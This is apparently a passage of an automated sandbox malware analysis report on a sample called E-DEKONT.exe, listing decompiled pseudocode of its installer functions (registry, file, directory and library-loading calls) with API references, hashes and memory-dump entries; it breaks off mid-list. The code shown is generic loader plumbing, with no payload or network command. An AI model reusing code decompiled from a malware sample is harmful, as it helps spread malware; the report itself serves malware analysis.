					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061C9(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}








                                                                            0x0040247e
                                                                            0x0040247e
                                                                            0x00402483
                                                                            0x0040248a
                                                                            0x0040248c
                                                                            0x00402493
                                                                            0x00402496
                                                                            0x00402885
                                                                            0x0040249c
                                                                            0x0040249f
                                                                            0x004024ba
                                                                            0x004024ea
                                                                            0x004024ea
                                                                            0x004024ed
                                                                            0x004024bc
                                                                            0x004024c0
                                                                            0x004024d9
                                                                            0x004024e0
                                                                            0x004024e3
                                                                            0x004024c2
                                                                            0x004024c5
                                                                            0x004024d0
                                                                            0x00402549
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004024c5
                                                                            0x004024c0
                                                                            0x00402550
                                                                            0x00402551
                                                                            0x00402551
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 0938e9b4f9308f6345532a113f67175e1bd9ec8ec38cc62e7fbccb862b86bbb8
                                                                            • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                            • Opcode Fuzzy Hash: 0938e9b4f9308f6345532a113f67175e1bd9ec8ec38cc62e7fbccb862b86bbb8
                                                                            • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 69%
                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433ecc =  *0x433ecc + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433ecc, 0x7530,  *0x433eb4), 0);
					}
				}
				return 0;
			}











                                                                            0x0040138a
                                                                            0x004013fa
                                                                            0x0040139b
                                                                            0x004013a0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004013a2
                                                                            0x004013a3
                                                                            0x004013ad
                                                                            0x00000000
                                                                            0x00401404
                                                                            0x004013b0
                                                                            0x004013b7
                                                                            0x004013bd
                                                                            0x004013be
                                                                            0x004013c0
                                                                            0x004013c2
                                                                            0x004013b9
                                                                            0x004013b9
                                                                            0x004013ba
                                                                            0x004013ba
                                                                            0x004013c9
                                                                            0x004013cb
                                                                            0x004013f4
                                                                            0x004013f4
                                                                            0x004013c9
                                                                            0x00000000

                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                            • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                            • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                            • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402388(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}










                                                                            0x00402388
                                                                            0x00402388
                                                                            0x0040238b
                                                                            0x0040238e
                                                                            0x004023ca
                                                                            0x004023cf
                                                                            0x00000000
                                                                            0x00402390
                                                                            0x00402392
                                                                            0x00402397
                                                                            0x0040239b
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x004023a1
                                                                            0x004023b1
                                                                            0x004023b3
                                                                            0x004023d1
                                                                            0x004023d3
                                                                            0x00000000
                                                                            0x004023d9
                                                                            0x004023d3
                                                                            0x0040239b
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: fccc67dc7d506ba8a36f8f9ce9b9504af6e86eb791f9cdf3a62a8028c2eeb98f
                                                                            • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                            • Opcode Fuzzy Hash: fccc67dc7d506ba8a36f8f9ce9b9504af6e86eb791f9cdf3a62a8028c2eeb98f
                                                                            • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
                                                                            • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                            • Opcode Fuzzy Hash: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
                                                                            • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040665C(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065EC(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                            0x00406664
                                                                            0x00406667
                                                                            0x0040666e
                                                                            0x00406676
                                                                            0x00406682
                                                                            0x00000000
                                                                            0x00406689
                                                                            0x00406679
                                                                            0x00406680
                                                                            0x00000000
                                                                            0x00406691
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                              • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                              • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                              • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                                            • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 68%
                                                                            			E00405D74(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                            0x00405d78
                                                                            0x00405d85
                                                                            0x00405d9a
                                                                            0x00405da0

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405D4F Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405D4F(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                            0x00405d54
                                                                            0x00405d5a
                                                                            0x00405d5f
                                                                            0x00405d68
                                                                            0x00405d68
                                                                            0x00405d71

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405954,?,?,00000000,00405B2A,?,?,?,?), ref: 00405D54
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D68
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction ID: 17c45ac7ebe851d6f29742f799baae9df596671d30cdc88244d2177400b79203
                                                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction Fuzzy Hash: C6D01276505420AFC2512738EF0C89FBF95DB54371B068B35FAE9A22F0CB304C578A98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405832(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                            0x00405838
                                                                            0x00405840
                                                                            0x00000000
                                                                            0x00405846
                                                                            0x00000000

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                            • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                            • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B633B8 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            • Opcode ID: 0d1cf02e9a26cfe1b4344c9c62e7f2c7362a1520744ddbea3fde4b3436e071be
                                                                            • Instruction ID: 361f0527b72925d765677335ddfc1b755391290438173b15c2bf34d1d60f5095
                                                                            • Opcode Fuzzy Hash: 0d1cf02e9a26cfe1b4344c9c62e7f2c7362a1520744ddbea3fde4b3436e071be
                                                                            • Instruction Fuzzy Hash: E8216D261087864BD326EE25C44C0E4BBD39F531B4B9C8D9EC1C44BD0BCA2214C8C652
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 33%
                                                                            			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061E2(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004061C9();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                                            0x004027e9
                                                                            0x004027e9
                                                                            0x004027ea
                                                                            0x004027f2
                                                                            0x004027f7
                                                                            0x004027f8
                                                                            0x00402807
                                                                            0x00402810
                                                                            0x00402a61
                                                                            0x00402a62
                                                                            0x00402a65
                                                                            0x00402a65
                                                                            0x00402810
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                              • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
